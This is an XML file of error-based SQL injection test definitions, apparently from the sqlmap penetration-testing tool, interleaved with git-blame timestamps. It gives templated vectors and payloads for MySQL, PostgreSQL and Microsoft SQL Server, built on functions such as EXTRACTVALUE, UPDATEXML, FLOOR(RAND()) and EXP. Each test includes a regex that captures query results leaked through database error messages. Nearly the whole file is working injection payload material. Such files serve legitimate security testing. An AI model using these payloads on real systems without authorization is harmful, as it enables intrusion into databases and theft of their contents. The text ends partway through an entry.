2015-02-18 13:13:44 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<root >
2015-02-20 21:34:47 +03:00
<!-- Error - based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<!-- It does not work against ORDER BY or GROUP BY clause -->
2017-09-15 15:23:55 +03:00
<title > MySQL > = 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2017-09-15 15:23:55 +03:00
<title > MySQL > = 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.7.8</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<!-- It does not work against ORDER BY or GROUP BY clause -->
2017-09-15 15:23:55 +03:00
<title > MySQL > = 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.7.8</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-08-28 11:52:36 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
2015-08-28 11:52:36 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 1</level>
2015-08-28 11:52:36 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-08-28 11:52:36 +03:00
<where > 1</where>
2016-10-05 00:48:09 +03:00
<vector > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
2015-08-28 11:52:36 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
2016-10-05 00:48:09 +03:00
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2016-06-01 15:12:22 +03:00
-->
2016-10-05 00:48:09 +03:00
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2015-08-28 11:52:36 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-08-28 11:52:36 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
2015-08-28 11:52:36 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 1</level>
2015-08-28 11:52:36 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2016-06-01 15:12:22 +03:00
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
2015-08-28 11:52:36 +03:00
<where > 1</where>
2016-10-05 00:48:09 +03:00
<vector > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
2015-08-28 11:52:36 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
2016-10-05 00:48:09 +03:00
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2016-06-01 15:12:22 +03:00
-->
2016-10-05 00:48:09 +03:00
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2015-08-28 11:52:36 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-08-28 11:52:36 +03:00
</details>
</test>
2016-06-01 14:23:41 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
2016-06-01 14:23:41 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 2</level>
2016-06-01 14:23:41 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2016-06-01 14:23:41 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2016-06-01 14:23:41 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
2016-06-01 14:23:41 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2016-06-01 14:23:41 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
2016-06-01 14:23:41 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 2</level>
2016-06-01 14:23:41 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2016-06-01 15:12:22 +03:00
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
2016-06-01 14:23:41 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2016-06-01 14:23:41 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
2016-06-01 14:23:41 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2016-06-01 14:23:41 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2016-06-01 15:12:22 +03:00
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 2</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-20 21:34:47 +03:00
<vector > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-->
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<!-- It does not work against ORDER BY or GROUP BY clause -->
2017-09-15 15:23:55 +03:00
<title > MySQL > = 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 2</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-20 21:34:47 +03:00
<vector > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-->
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-02-20 21:34:47 +03:00
<!-- This payload with AND does not work -->
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-20 21:34:47 +03:00
<where > 2</where>
<vector > OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
<comment > #</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > MySQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > PostgreSQL AND error-based - WHERE or HAVING clause</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 1</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-20 21:34:47 +03:00
<vector > AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > PostgreSQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > PostgreSQL OR error-based - WHERE or HAVING clause</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 1</level>
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
2015-02-20 21:34:47 +03:00
<vector > OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > PostgreSQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 1</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
